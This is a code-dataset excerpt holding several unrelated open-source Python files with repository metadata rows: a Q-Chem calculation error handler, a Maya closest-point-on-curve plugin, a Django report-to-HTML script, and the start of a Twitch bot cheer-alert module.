ex_backup_list ([str]): List of the files to backup in addition
to input and output file.
rca_gdm_thresh (float): The threshold for the prior scf algorithm.
If last deltaE is larger than the threshold try RCA_DIIS
first, else, try DIIS_GDM first.
scf_max_cycles (int): The max iterations to set to fix SCF failure.
geom_max_cycles (int): The max iterations to set to fix geometry
optimization failure.
qchem_job (QchemJob): the managing object to run qchem.
"""
self.input_file = input_file
self.output_file = output_file
self.ex_backup_list = ex_backup_list
self.rca_gdm_thresh = rca_gdm_thresh
self.scf_max_cycles = scf_max_cycles
self.geom_max_cycles = geom_max_cycles
self.outdata = None
self.qcinp = None
self.error_step_id = None
self.errors = None
self.fix_step = None
self.qchem_job = qchem_job
def check(self):
# Checks output file for errors.
self.outdata = QcOutput(self.output_file).data
self.qcinp = QcInput.from_file(self.input_file)
self.error_step_id = None
self.errors = None
self.fix_step = None
for i, od in enumerate(self.outdata):
if od["has_error"]:
self.error_step_id = i
self.fix_step = self.qcinp.jobs[i]
self.errors = sorted(list(set(od["errors"])))
return True
return False
def correct(self):
self.backup()
actions = []
error_rankings = ("pcm_solvent deprecated",
"autoz error",
"No input text",
"Killed",
"Insufficient static memory",
"Not Enough Total Memory",
"NAN values",
"Bad SCF convergence",
"Geometry optimization failed",
"Freq Job Too Small",
"Exit Code 134",
"Molecular charge is not found",
"Molecular spin multipilicity is not found"
)
e = self.errors[0]
for prio_error in error_rankings:
if prio_error in self.errors:
e = prio_error
break
if e == "autoz error":
if "sym_ignore" not in self.fix_step.params["rem"]:
self.fix_step.disable_symmetry()
actions.append("disable symmetry")
else:
return {"errors": self.errors, "actions": None}
elif e == "Bad SCF convergence":
act = self.fix_scf()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Geometry optimization failed":
act = self.fix_geom_opt()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "NAN values":
if "xc_grid" not in self.fix_step.params["rem"]:
self.fix_step.set_dft_grid(128, 302)
actions.append("use tighter grid")
else:
return {"errors": self.errors, "actions": None}
elif e == "No input text":
if "sym_ignore" not in self.fix_step.params["rem"]:
self.fix_step.disable_symmetry()
actions.append("disable symmetry")
else:
                # This indicates that something strange occurred on the
                # compute node. Wait for 30 minutes so the job doesn't fail
                # again immediately and burn through all the retries.
if "PBS_JOBID" in os.environ and ("edique" in os.environ["PBS_JOBID"]
or "hopque" in os.environ["PBS_JOBID"]):
time.sleep(30.0 * 60.0)
return {"errors": self.errors, "actions": None}
elif e == "Freq Job Too Small":
natoms = len(self.fix_step.mol)
if "cpscf_nseg" not in self.fix_step.params["rem"] or \
self.fix_step.params["rem"]["cpscf_nseg"] != natoms:
self.fix_step.params["rem"]["cpscf_nseg"] = natoms
actions.append("use {} segment in CPSCF".format(natoms))
else:
return {"errors": self.errors, "actions": None}
elif e == "pcm_solvent deprecated":
solvent_params = self.fix_step.params.pop("pcm_solvent", None)
if solvent_params is not None:
self.fix_step.params["solvent"] = solvent_params
actions.append("use keyword solvent instead")
else:
return {"errors": self.errors, "actions": None}
elif e == "Exit Code 134":
act = self.fix_error_code_134()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Killed":
act = self.fix_error_killed()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Insufficient static memory":
act = self.fix_insufficient_static_memory()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Not Enough Total Memory":
act = self.fix_not_enough_total_memory()
if act:
actions.append(act)
else:
return {"errors": self.errors, "actions": None}
elif e == "Molecular charge is not found":
return {"errors": self.errors, "actions": None}
elif e == "Molecular spin multipilicity is not found":
return {"errors": self.errors, "actions": None}
else:
return {"errors": self.errors, "actions": None}
self.qcinp.write_file(self.input_file)
return {"errors": self.errors, "actions": actions}
def fix_not_enough_total_memory(self):
if self.fix_step.params['rem']["jobtype"] in ["freq", "nmr"]:
ncpu = 1
if "-np" in self.qchem_job.current_command:
cmd = self.qchem_job.current_command
ncpu = int(cmd[cmd.index("-np") + 1])
natoms = len(self.qcinp.jobs[0].mol)
times_ncpu_full = int(natoms/ncpu)
nsegment_full = ncpu * times_ncpu_full
times_ncpu_half = int(natoms/(ncpu/2))
nsegment_half = int((ncpu/2) * times_ncpu_half)
if "cpscf_nseg" not in self.fix_step.params["rem"]:
self.fix_step.params["rem"]["cpscf_nseg"] = nsegment_full
return "Use {} CPSCF segments".format(nsegment_full)
elif self.fix_step.params["rem"]["cpscf_nseg"] < nsegment_half:
self.qchem_job.select_command("half_cpus", self.qcinp)
self.fix_step.params["rem"]["cpscf_nseg"] = nsegment_half
return "Use half CPUs and {} CPSCF segments".format(nsegment_half)
return None
elif not self.qchem_job.is_openmp_compatible(self.qcinp):
if self.qchem_job.current_command_name != "half_cpus":
self.qchem_job.select_command("half_cpus", self.qcinp)
return "half_cpus"
else:
return None
def fix_error_code_134(self):
if "thresh" not in self.fix_step.params["rem"]:
self.fix_step.set_integral_threshold(thresh=12)
return "use tight integral threshold"
elif not (self.qchem_job.is_openmp_compatible(self.qcinp) and
self.qchem_job.command_available("openmp")):
if self.qchem_job.current_command_name != "half_cpus":
self.qchem_job.select_command("half_cpus", self.qcinp)
return "half_cpus"
else:
if self.fix_step.params['rem']["jobtype"] in ["freq", "nmr"]:
act = self.fix_not_enough_total_memory()
return act
return None
elif self.qchem_job.current_command_name != "openmp":
self.qchem_job.select_command("openmp", self.qcinp)
return "openmp"
else:
if self.fix_step.params['rem']["jobtype"] in ["freq", "nmr"]:
act = self.fix_not_enough_total_memory()
return act
return None
def fix_insufficient_static_memory(self):
if not (self.qchem_job.is_openmp_compatible(self.qcinp)
and self.qchem_job.command_available("openmp")):
if self.qchem_job.current_command_name != "half_cpus":
self.qchem_job.select_command("half_cpus", self.qcinp)
return "half_cpus"
elif not self.qchem_job.large_static_mem:
self.qchem_job.large_static_mem = True
# noinspection PyProtectedMember
self.qchem_job._set_qchem_memory(self.qcinp)
return "Increase Static Memory"
else:
return None
elif self.qchem_job.current_command_name != "openmp":
self.qchem_job.select_command("openmp", self.qcinp)
return "Use OpenMP"
elif not self.qchem_job.large_static_mem:
self.qchem_job.large_static_mem = True
# noinspection PyProtectedMember
self.qchem_job._set_qchem_memory(self.qcinp)
return "Increase Static Memory"
else:
return None
def fix_error_killed(self):
if not (self.qchem_job.is_openmp_compatible(self.qcinp)
and self.qchem_job.command_available("openmp")):
if self.qchem_job.current_command_name != "half_cpus":
self.qchem_job.select_command("half_cpus", self.qcinp)
return "half_cpus"
else:
return None
elif self.qchem_job.current_command_name != "openmp":
self.qchem_job.select_command("openmp", self.qcinp)
return "Use OpenMP"
else:
return None
def fix_scf(self):
comments = self.fix_step.params.get("comment", "")
scf_pattern = re.compile(r"<SCF Fix Strategy>(.*)</SCF Fix "
r"Strategy>", flags=re.DOTALL)
old_strategy_text = re.findall(scf_pattern, comments)
if len(old_strategy_text) > 0:
old_strategy_text = old_strategy_text[0]
od = self.outdata[self.error_step_id]
if "Negative Eigen" in self.errors:
if "thresh" not in self.fix_step.params["rem"]:
self.fix_step.set_integral_threshold(thresh=12)
return "use tight integral threshold"
elif int(self.fix_step.params["rem"]["thresh"]) < 14:
self.fix_step.set_integral_threshold(thresh=14)
return "use even tighter integral threshold"
if len(od["scf_iteration_energies"]) == 0 \
or len(od["scf_iteration_energies"][-1]) <= 10:
if 'Exit Code 134' in self.errors:
# immature termination of SCF
return self.fix_error_code_134()
else:
return None
if od["jobtype"] in ["opt", "ts", "aimd"] \
and len(od["molecules"]) >= 2:
strategy = "reset"
elif len(old_strategy_text) > 0:
strategy = json.loads(old_strategy_text)
strategy["current_method_id"] += 1
else:
strategy = dict()
scf_iters = od["scf_iteration_energies"][-1]
if scf_iters[-1][1] >= self.rca_gdm_thresh:
strategy["methods"] = ["increase_iter", "rca_diis", "gwh",
"gdm", "rca", "core+rca", "fon"]
strategy["current_method_id"] = 0
else:
strategy["methods"] = ["increase_iter", "diis_gdm", "gwh",
"rca", "gdm", "core+gdm", "fon"]
strategy["current_method_id"] = 0
strategy["version"] = 2.0
# noinspection PyTypeChecker
if strategy == "reset":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
if self.error_step_id > 0:
self.set_scf_initial_guess("read")
else:
self.set_scf_initial_guess("sad")
if od["jobtype"] in ["opt", "ts"]:
self.set_last_input_geom(od["molecules"][-1])
else:
assert od["jobtype"] == "aimd"
from pymatgen.io.qchem import QcNucVeloc
from pymatgen.io.xyz import XYZ
scr_dir = od["scratch_dir"]
qcnv_filepath = os.path.join(scr_dir, "AIMD", "NucVeloc")
qc_md_view_filepath = os.path.join(scr_dir, "AIMD", "View.xyz")
qcnv = QcNucVeloc(qcnv_filepath)
qc_md_view = XYZ.from_file(qc_md_view_filepath)
assert len(qcnv.velocities) == len(qc_md_view.all_molecules)
aimd_steps = self.fix_step.params["rem"]["aimd_steps"]
elapsed_steps = len(qc_md_view.all_molecules)
remaining_steps = aimd_steps - elapsed_steps + 1
self.fix_step.params["rem"]["aimd_steps"] = remaining_steps
self.set_last_input_geom(qc_md_view.molecule)
self.fix_step.set_velocities(qcnv.velocities[-1])
self.fix_step.params["rem"].pop("aimd_init_veloc", None)
traj_num = max([0] + [int(f.split(".")[1])
for f in glob.glob("traj_View.*.xyz")])
dest_view_filename = "traj_View.{}.xyz".format(traj_num + 1)
dest_nv_filename = "traj_NucVeloc.{}.txt".format(traj_num + 1)
logging.info("Backing up trajectory files to {} and {}."
.format(dest_view_filename, dest_nv_filename))
shutil.copy(qc_md_view_filepath, dest_view_filename)
shutil.copy(qcnv_filepath, dest_nv_filename)
if len(old_strategy_text) > 0:
comments = scf_pattern.sub("", comments)
self.fix_step.params["comment"] = comments
if len(comments.strip()) == 0:
self.fix_step.params.pop("comment")
return "reset"
elif strategy["current_method_id"] > len(strategy["methods"])-1:
return None
else:
# noinspection PyTypeChecker
method = strategy["methods"][strategy["current_method_id"]]
if method == "increase_iter":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
elif method == "rca_diis":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="rca_diis", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
elif method == "gwh":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("gwh")
elif method == "gdm":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="gdm", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
elif method == "rca":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="rca", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
elif method == "core+rca":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="rca", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("core")
elif method == "diis_gdm":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis_gdm", iterations=self.scf_max_cycles)
self.fix_step.set_scf_initial_guess("sad")
elif method == "core+gdm":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="gdm", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("core")
elif method == "fon":
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
self.set_scf_initial_guess("sad")
natoms = len(od["molecules"][-1])
self.fix_step.params["rem"]["occupations"] = 2
self.fix_step.params["rem"]["fon_norb"] = int(natoms * 0.618)
self.fix_step.params["rem"]["fon_t_start"] = 300
self.fix_step.params["rem"]["fon_t_end"] = 300
self.fix_step.params["rem"]["fon_e_thresh"] = 6
self.fix_step.set_integral_threshold(14)
self.fix_step.set_scf_convergence_threshold(7)
else:
raise ValueError("fix method " + method + " is not supported")
strategy_text = "<SCF Fix Strategy>"
strategy_text += json.dumps(strategy, indent=4, sort_keys=True)
strategy_text += "</SCF Fix Strategy>"
if len(old_strategy_text) > 0:
comments = scf_pattern.sub(strategy_text, comments)
else:
comments += "\n" + strategy_text
self.fix_step.params["comment"] = comments
return method
def set_last_input_geom(self, new_mol):
for i in range(self.error_step_id, -1, -1):
qctask = self.qcinp.jobs[i]
if isinstance(qctask.mol, Molecule):
qctask.mol = copy.deepcopy(new_mol)
def set_scf_initial_guess(self, guess="sad"):
if "scf_guess" not in self.fix_step.params["rem"] \
or self.error_step_id > 0 \
or self.fix_step.params["rem"]["scf_guess"] != "read":
self.fix_step.set_scf_initial_guess(guess)
def fix_geom_opt(self):
comments = self.fix_step.params.get("comment", "")
geom_pattern = re.compile(r"<Geom Opt Fix Strategy>(.*)"
r"</Geom Opt Fix Strategy>",
flags=re.DOTALL)
old_strategy_text = re.findall(geom_pattern, comments)
if len(old_strategy_text) > 0:
old_strategy_text = old_strategy_text[0]
od = self.outdata[self.error_step_id]
if 'Lamda Determination Failed' in self.errors and len(od["molecules"])>=2:
self.fix_step.set_scf_algorithm_and_iterations(
algorithm="diis", iterations=self.scf_max_cycles)
if self.error_step_id > 0:
self.set_scf_initial_guess("read")
else:
self.set_scf_initial_guess("sad")
self.set_last_input_geom(od["molecules"][-1])
if od["jobtype"] == "aimd":
aimd_steps = self.fix_step.params["rem"]["aimd_steps"]
elapsed_steps = len(od["molecules"]) - 1
remaining_steps = aimd_steps - elapsed_steps + 1
self.fix_step.params["rem"]["aimd_steps"] = remaining_steps
if len(old_strategy_text) > 0:
comments = geom_pattern.sub("", comments)
self.fix_step.params["comment"] = comments
if len(comments.strip()) == 0:
self.fix_step.params.pop("comment")
return "reset"
if len(od["molecules"]) <= 10:
# immature termination of geometry optimization
if 'Exit Code 134' in self.errors:
return self.fix_error_code_134()
else:
return None
if len(old_strategy_text) > 0:
strategy = json.loads(old_strategy_text)
strategy["current_method_id"] += 1
else:
strategy = dict()
strategy["methods"] = ["increase_iter", "GDIIS", "CartCoords"]
strategy["current_method_id"] = 0
if strategy["current_method_id"] > len(strategy["methods"]) - 1:
return None
else:
method = strategy["methods"][strategy["current_method_id"]]
if method == "increase_iter":
self.fix_step.set_geom_max_iterations(self.geom_max_cycles)
self.set_last_input_geom(od["molecules"][-1])
elif method == "GDIIS":
self.fix_step.set_geom_opt_use_gdiis(subspace_size=5)
self.fix_step.set_geom_max_iterations(self.geom_max_cycles)
self.set_last_input_geom(od["molecules"][-1])
elif method == "CartCoords":
self.fix_step.set_geom_opt_coords_type("cartesian")
self.fix_step.set_geom_max_iterations(self.geom_max_cycles)
self.fix_step.set_geom_opt_use_gdiis(0)
self.set_last_input_geom(od["molecules"][-1])
else:
raise ValueError("fix method" + method + "is not supported")
strategy_text = "<Geom Opt Fix Strategy>"
strategy_text += json.dumps(strategy, indent=4, sort_keys=True)
strategy_text += "</Geom Opt Fix Strategy>"
if len(old_strategy_text) > 0:
comments = geom_pattern.sub(strategy_text, comments)
else:
comments += "\n" + strategy_text
self.fix_step.params["comment"] = comments
return method
def backup(self):
error_num = max([0] + [int(f.split(".")[1])
for f in glob.glob("error.*.tar.gz")])
filename = "error.{}.tar.gz".format(error_num + 1)
logging.info("Backing up run to {}.".format(filename))
tar = tarfile.open(filename, "w:gz")
bak_list = [self.input_file, self.output_file] + \
list(self.ex_backup_list)
for f in bak_list:
if os.path.exists(f):
tar.add(f)
tar.close()
def as_dict(self):
return {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"input_file": self.input_file,
"output_file": self.output_file,
"ex_backup_list": tuple(self.ex_backup_list),
"rca_gdm_thresh": self.rca_gdm_thresh,
"scf_max_cycles": self.scf_max_cycles,
"geom_max_cycles": self.geom_max_cycles,
"outdata": self.outdata,
"qcinp": self.qcinp.as_dict() if self.qcinp else None,
"error_step_id": self.error_step_id,
"errors": self.errors,
"fix_step": self.fix_step.as_dict() if self.fix_step else None}
@classmethod
def from_dict(cls, d):
h = QChemErrorHandler(input_file=d["input_file"],
output_file=d["output_file"],
ex_backup_list=d["ex_backup_list"],
rca_gdm_thresh=d["rca_gdm_thresh"],
scf_max_cycles=d["scf_max_cycles"],
geom_max_cycles=d["geom_max_cycles"])
h.outdata = d["outdata"]
h.qcinp = QcInput.from_dict(d["qcinp"]) if d["qcinp"] else None
h.error_step_id = d["error_step_id"]
h.errors = d["errors"]
h.fix_step = QcTask.from_dict(d["fix_step"]) if d["fix_step"] else None
return h
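# Minimal usage sketch (not from the original source; the file names and qchem_job
# object are placeholders). In practice custodian drives this check/correct loop:
#
#   handler = QChemErrorHandler(input_file="mol.qcinp", output_file="mol.qcout",
#                               qchem_job=my_qchem_job)
#   if handler.check():                    # scan mol.qcout for known error patterns
#       result = handler.correct()         # patch mol.qcinp and back up the run
#       print(result["errors"], result["actions"])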
|
mit
| -107,415,132,109,779,500
| 44.735507
| 90
| 0.528202
| false
| 3.812443
| false
| false
| false
|
sergeneren/anima
|
anima/env/mayaEnv/plugins/closestPointOnCurve.py
|
1
|
8872
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2015, Anima Istanbul
#
# This module is part of anima-tools and is released under the BSD 2
# License: http://www.opensource.org/licenses/BSD-2-Clause
import sys
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
kPluginNodeTypeName = "spClosestPointOnCurve"
cpocPluginId = OpenMaya.MTypeId(0x00349)
# Node definition
class closestPointOnCurve(OpenMayaMPx.MPxNode):
# the plugs
aInCurve = OpenMaya.MObject()
aInPosition = OpenMaya.MObject()
aOutPosition = OpenMaya.MObject()
aOutPositionX = OpenMaya.MObject()
aOutPositionY = OpenMaya.MObject()
aOutPositionZ = OpenMaya.MObject()
aOutNormal = OpenMaya.MObject()
aOutNormalX = OpenMaya.MObject()
aOutNormalY = OpenMaya.MObject()
aOutNormalZ = OpenMaya.MObject()
aOutParam = OpenMaya.MObject()
def __init__(self):
OpenMayaMPx.MPxNode.__init__(self)
def compute(self, plug, dataBlock):
if plug == closestPointOnCurve.aOutPosition or plug == closestPointOnCurve.aOutParam:
dataHandle = dataBlock.inputValue(closestPointOnCurve.aInCurve)
inputAsCurve = dataHandle.asNurbsCurve()
#if not inputAsCurve.hasFn(OpenMaya.MFn.kNurbsCurve):
# return OpenMaya.kUnknownParameter
dataHandle = dataBlock.inputValue(closestPointOnCurve.aInPosition)
inPositionAsFloat3 = dataHandle.asFloat3()
inPosition = OpenMaya.MPoint(
inPositionAsFloat3[0],
inPositionAsFloat3[1],
inPositionAsFloat3[2]
)
# connect the MFnNurbsCurve
# and ask the closest point
nurbsCurveFn = OpenMaya.MFnNurbsCurve(inputAsCurve)
# get and set outPosition
outParam = OpenMaya.MScriptUtil()
outParam.createFromDouble(0)
outParamPtr = outParam.asDoublePtr()
            # get position and parameter
outPosition = nurbsCurveFn.closestPoint(
inPosition, True, outParamPtr, 0.001, OpenMaya.MSpace.kWorld
)
outputHandle = dataBlock.outputValue(
closestPointOnCurve.aOutPosition
)
outputHandle.set3Float(outPosition.x, outPosition.y, outPosition.z)
# get and set outNormal
#outNormal = nurbsCurveFn.normal(parameter, OpenMaya.MSpace.kWorld)
#outputHandle = dataBlock.outputValue(closestPointOnCurve.aOutNormal)
#outputHandle.set3Float(outNormal.x, outNormal.y, outNormal.z)
#outputHandle.set3Float(0, 1, 0 )
# get and set the uvs
outputHandle = dataBlock.outputValue(closestPointOnCurve.aOutParam)
#outputHandle.setFloat(OpenMaya.MScriptUtil(outParamPtr).asDouble())
outputHandle.setFloat(OpenMaya.MScriptUtil.getDouble(outParamPtr))
dataBlock.setClean(plug)
else:
return OpenMaya.kUnknownParameter
# creator
def nodeCreator():
return OpenMayaMPx.asMPxPtr(closestPointOnCurve())
# initializer
def nodeInitializer():
tAttr = OpenMaya.MFnTypedAttribute()
nAttr = OpenMaya.MFnNumericAttribute()
# input curve
closestPointOnCurve.aInCurve = tAttr.create(
"inCurve", "ic", OpenMaya.MFnData.kNurbsCurve
)
tAttr.setStorable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInCurve)
# input position
closestPointOnCurve.aInPositionX = nAttr.create(
"inPositionX", "ipx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionX)
closestPointOnCurve.aInPositionY = nAttr.create(
"inPositionY", "ipy", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionY)
closestPointOnCurve.aInPositionZ = nAttr.create(
"inPositionZ", "ipz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPositionZ)
closestPointOnCurve.aInPosition = nAttr.create(
"inPosition", "ip",
closestPointOnCurve.aInPositionX,
closestPointOnCurve.aInPositionY,
closestPointOnCurve.aInPositionZ
)
nAttr.setStorable(1)
nAttr.setKeyable(1)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aInPosition)
# output position
closestPointOnCurve.aOutPositionX = nAttr.create(
"outPositionX", "opx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionX)
closestPointOnCurve.aOutPositionY = nAttr.create(
"outPositionY", "opy", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionY)
closestPointOnCurve.aOutPositionZ = nAttr.create(
"outPositionZ", "opz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPositionZ)
closestPointOnCurve.aOutPosition = nAttr.create(
"outPosition", "op",
closestPointOnCurve.aOutPositionX,
closestPointOnCurve.aOutPositionY,
closestPointOnCurve.aOutPositionZ
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutPosition)
# output normal
closestPointOnCurve.aOutNormalX = nAttr.create(
"outNormalX", "onx", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalX)
closestPointOnCurve.aOutNormalY = nAttr.create(
"outNormalY", "ony", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalY)
closestPointOnCurve.aOutNormalZ = nAttr.create(
"outNormalZ", "onz", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setWritable(0)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormalZ)
closestPointOnCurve.aOutNormal = nAttr.create(
"outNormal", "on",
closestPointOnCurve.aOutNormalX,
closestPointOnCurve.aOutNormalY,
closestPointOnCurve.aOutNormalZ
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutNormal)
closestPointOnCurve.aOutParam = nAttr.create(
"outParam", "opa", OpenMaya.MFnNumericData.kFloat, 0.0
)
nAttr.setStorable(0)
nAttr.setKeyable(0)
nAttr.setWritable(1)
closestPointOnCurve.addAttribute(closestPointOnCurve.aOutParam)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutPosition
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutPosition
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutParam
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutParam
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInCurve,
closestPointOnCurve.aOutNormal
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aInPosition,
closestPointOnCurve.aOutNormal
)
closestPointOnCurve.attributeAffects(
closestPointOnCurve.aOutParam,
closestPointOnCurve.aOutPosition
)
# initialize the script plug-in
def initializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject, "Erkan Ozgur Yilmaz","1.0.2")
try:
mplugin.registerNode(
kPluginNodeTypeName,
cpocPluginId,
nodeCreator,
nodeInitializer
)
except:
sys.stderr.write("Failed to register node: %s" % kPluginNodeTypeName)
raise
# uninitialize the script plug-in
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
try:
mplugin.deregisterNode(cpocPluginId)
except:
sys.stderr.write("Failed to deregister node: %s" % kPluginNodeTypeName)
raise
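# Hedged usage sketch inside Maya (the curve shape name and position values are
# placeholders; only the plugin and attribute names registered above come from this file):
#
#   import maya.cmds as cmds
#   cmds.loadPlugin('closestPointOnCurve.py')
#   node = cmds.createNode('spClosestPointOnCurve')
#   cmds.connectAttr('curveShape1.worldSpace[0]', node + '.inCurve')
#   cmds.setAttr(node + '.inPosition', 1.0, 2.0, 3.0)
#   cmds.getAttr(node + '.outPosition')   # closest point on the curve in world space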
|
bsd-2-clause
| -1,998,576,980,713,366,500
| 32.228464
| 93
| 0.679554
| false
| 3.486051
| false
| false
| false
|
appknox/vendor
|
ak_vendor/report_sample.py
|
1
|
1164
|
import json
from os.path import dirname, abspath
from django import template
from django.conf import settings
from django.template import Template, Context
from django.template.engine import Engine
from django.core.wsgi import get_wsgi_application
from ak_vendor.report import Report
settings.configure()
application = get_wsgi_application()
CUR_DIR = dirname(abspath(__file__))
template.Library()
class ReportHTMLExporter:
def __init__(self, report):
self.report = report
def to_html(self):
tpl = open('{}/report/report_template.html'.format(CUR_DIR)).read()
template = Template(tpl, engine=Engine(libraries={
'i18n': 'django.templatetags.i18n'
}))
context = Context({
'report': self.report
})
content = template.render(context)
return content
def to_html_file(self, path=''):
with open('{}/output.html'.format(path), 'w') as file:
tpl = self.to_html()
file.write(tpl)
data = json.load(open('{}/report_sample1.json'.format(CUR_DIR)))
report_obj = Report.from_json(data)
ReportHTMLExporter(report_obj).to_html_file(CUR_DIR)
|
mit
| 2,017,626,688,635,430,700
| 28.1
| 75
| 0.664089
| false
| 3.742765
| false
| false
| false
|
pajlada/pajbot
|
pajbot/modules/chat_alerts/cheeralert.py
|
1
|
12111
|
import logging
import math
from pajbot.managers.handler import HandlerManager
from pajbot.modules import BaseModule
from pajbot.modules import ModuleSetting
from pajbot.modules.chat_alerts import ChatAlertModule
log = logging.getLogger(__name__)
class CheerAlertModule(BaseModule):
ID = __name__.split(".")[-1]
NAME = "Cheer Alert"
DESCRIPTION = "Prints a message in chat/whispers when a user cheers in your chat"
CATEGORY = "Feature"
ENABLED_DEFAULT = False
PARENT_MODULE = ChatAlertModule
SETTINGS = [
ModuleSetting(
key="chat_message",
label="Enable chat messages for users who cheer bits",
type="boolean",
required=True,
default=True,
),
ModuleSetting(
key="whisper_message",
label="Enable whisper messages for users who cheer bits",
type="boolean",
required=True,
default=False,
),
ModuleSetting(
key="whisper_after",
label="Whisper the message after X seconds",
type="number",
required=True,
placeholder="",
default=5,
constraints={"min_value": 1, "max_value": 120},
),
ModuleSetting(
key="one_bit",
label="Chat message for users who cheer 1 or more bits | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="{username} thank you so much for cheering {num_bits} bits! PogChamp",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="sixnine_bits",
label="Chat message for users who cheer 69 bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! Kreygasm",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="hundred_bits",
label="Chat message for users who cheer 100 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fourtwenty_bits",
label="Chat message for users who cheer 420 bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! CiGrip",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fivehundred_bits",
label="Chat message for users who cheer 500 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fifteenhundred_bits",
label="Chat message for users who cheer 1500 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="fivethousand_bits",
label="Chat message for users who cheer 5000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="tenthousand_bits",
label="Chat message for users who cheer 10000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
placeholder="{username} thank you so much for cheering {num_bits} bits! PogChamp",
default="",
constraints={"max_str_len": 400},
),
ModuleSetting(
key="twentyfivethousand_bits",
label="Chat message for users who cheer 25000 or more bits, leave empty to fallback to the previous bit amount message. | Available arguments: {username}, {num_bits}",
type="text",
required=True,
